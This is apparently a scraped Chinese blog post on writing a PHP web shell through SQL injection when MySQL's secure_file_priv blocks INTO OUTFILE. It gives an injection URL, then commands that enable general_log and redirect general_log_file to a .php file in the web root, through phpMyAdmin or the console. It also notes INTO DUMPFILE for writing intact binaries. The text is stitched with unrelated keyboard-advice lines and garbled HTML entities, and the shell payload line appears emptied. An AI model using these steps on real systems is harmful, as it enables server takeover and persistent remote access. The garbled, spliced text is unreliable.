sql注入怎么使用linux命令,SQL注入写shell不成功后

8种机械键盘轴体对比

本人程序员&＃xff0c;要买一个写代码的键盘&＃xff0c;请问红轴和茶轴怎么选&＃xff1f;

之前遇到sql注入&＃xff0c;且是root权限后&＃xff0c;很容易直接写进去shell。现在的Mysql数据库的安全性也高了&＃xff0c;即使注入得到mysql的root权限&＃xff0c;有时候还是写不进去shell。

SQL 注入写 shellhttp://127.0.0.1:8000/waf/test.php?id&＃61;-1&＃39; union select 1,2,3 --&＃43;

root权限

写一句话的时候&＃xff0c;报错。如果能进入phpmyadmin后台&＃xff0c;可以试试一个方法。

就是--secure-file-priv的问题。

本地测试。

Mysql导出文件时报错mysql> select host from mysql.user into outfile &＃39;E:\test\1.txt&＃39;;

ERROR 1290 (HY000): The MySQL server is running with the --secure-file-priv opti

on so it cannot execute this statement

报错原因:secure_file_priv设置了指定目录&＃xff0c;需要在指定目录下进行数据导出。mysql> show variables like &＃39;%secure%&＃39;;

&＃43;------------------&＃43;-------&＃43;

| Variable_name | Value |

&＃43;------------------&＃43;-------&＃43;

| secure_auth | OFF |

| secure_file_priv | NULL |

&＃43;------------------&＃43;-------&＃43;

2 rows in set (0.00 sec)

secure_file_priv 参数为空&＃xff0c;表示没有可以导出的目录。这个参数用来限制数据导入和导出操作的效果&＃xff0c;例如执行LOAD DATA、SELECT … INTO OUTFILE语句和LOAD_FILE()函数。这些操作需要用户具有FILE权限。

如果这个参数为空&＃xff0c;这个变量没有效果&＃xff1b;

如果这个参数设为一个目录名&＃xff0c;MySQL服务只允许在这个目录中执行文件的导入和导出操作。这个目录必须存在&＃xff0c;MySQL服务不会创建它&＃xff1b;

如果这个参数为NULL&＃xff0c;MySQL服务会禁止导入和导出操作。这个参数在MySQL 5.7.6版本引入

执行一下命令&＃xff0c;在终端是修改不了secure_file_priv的值的。mysql> show variables like &＃39;%secure%&＃39;;

&＃43;------------------&＃43;-------&＃43;

| Variable_name | Value |

&＃43;------------------&＃43;-------&＃43;

| secure_auth | OFF |

| secure_file_priv | NULL |

&＃43;------------------&＃43;-------&＃43;

2 rows in set (0.20 sec)

mysql> set global secure_file_priv &＃61; &＃39;D:\phpStudy\www\waf\shell\1.txt&＃39;;

ERROR 1238 (HY000): Variable &＃39;secure_file_priv&＃39; is a read only variable

此时是root权限&＃xff0c;into outfile写不了文件。这个时候&＃xff0c;如果能登录到phpmyadmin&＃xff0c;可以尝试一个方法。

在phpmyadmin后台中&＃xff0c;查看全局变量&＃xff1a;找到general log file和general log

将general log设置为ON

general log file 设置为shell的物理地址。

再执行一个写一句话的SQL语句。虽然还有报错&＃xff0c;但是已经写入进去了。

在D:phpStudywwwwafphpinfo.php中可以看到写入的php代码。

访问。

general_log

Command-Line Format --general-log

System Variable Name general_log

Scope Global

Dynamic Yes

Permitted Values Type boolean

Default OFF

Whether the general query log is enabled. The value can be 0 (or OFF) to disable the log or 1 (or ON) to enable the log. The default value depends on whether the --general_log option is given. The destination for log output is controlled by the log_output system variable; if that value is NONE, no log entries are written even if the log is enabled.

general_log_file

Command-Line Format --general-log-file&＃61;file_name

System Variable Name general_log_file

Scope Global

Dynamic Yes

Permitted Values Type file name

Default host_name.log

The name of the general query log file. The default value is host_name.log, but the initial value can be changed with the --general_log_file option.

如果登录不了phpmyadmin后台&＃xff0c;试试能登录mysql终端吗&＃xff1f;可以试着来执行以下命令。show variables like &＃39;%general%&＃39;; #查看配置

set global general_log &＃61; on; #开启general log模式

set global general_log_file &＃61; &＃39;D:\phpStudywww\waf\shell.php&＃39;; #设置写入shell路径

select &＃39;&＃39; #写入shell

window环境下在my.ini中设置 secure-file-priv&＃61;"D:/phpStudy/www/waf" 为数据库的导入和导出路径。

Ubuntu环境下

SELECT的SELECT … INTO形式可以使查询结果存储在变量中或写入文件中。导出数据到文本文件中。SELECT … INTO OUTFILE将选定的行写入文件。可以指定列和行结束符以产生特定的输出格式。

SELECT … INTO DUMPFILE将单行写入文件而不使用任何格式。outfile

区别&＃xff1a;mysql> select host from mysql.user into outfile &＃39;D:/phpStudy/www/waf/test.txt&＃39;;

Query OK, 3 rows affected (0.00 sec)

内容&＃xff1a;127.0.0.1

::1

localhostdumpfile

mysql> select host from mysql.user into dumpfile ‘D:/phpStudy/www/waf/test1.txt’

;

ERROR 1172 (42000): Result consisted of more than one row

只能导出一行内容。

若把一个可执行2进制文件用into outfile函数导出&＃xff0c;导出后可能会被破坏&＃xff0c;因为into outfile函数会在行末写入新行&＃xff0c;并且会转义换行符。这样2进制可执行文件会被破坏。这个时候用into dumpfile就能导出一个完整的可执行的2进制文件。

参考